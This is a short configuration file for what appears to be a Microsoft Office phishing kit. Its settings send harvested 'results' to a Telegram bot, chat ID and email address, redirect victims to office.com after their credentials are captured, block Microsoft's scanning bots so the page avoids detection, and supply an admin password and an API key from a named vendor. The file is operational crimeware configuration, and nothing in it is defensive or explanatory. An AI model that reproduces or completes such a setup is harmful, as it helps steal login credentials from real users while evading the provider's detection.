;Your bot token here
bot="1828790296:"
;Your Chat Id here
chat="1193698958"
;Name You can change your name here
name="Greatness Boss"
;your admin panel password
password="abf95cb47f6e7501d98"
;Your email for results here
email='';
;Your Redirect Url Here
finish="https://office.com/?auth=2"
;your whitelisted ip
ip = ""
;To send visits or not 1/0
send_visit="1"
;To block microsoft bot set to 1
block_bot="1"
;Your file name to save your results
results_file="rets.txt"
;Your api key here,you can get one from @fisherstell
api="a1fa7e77e1202572f5d777caa9fffd72e7e410e639c528494f"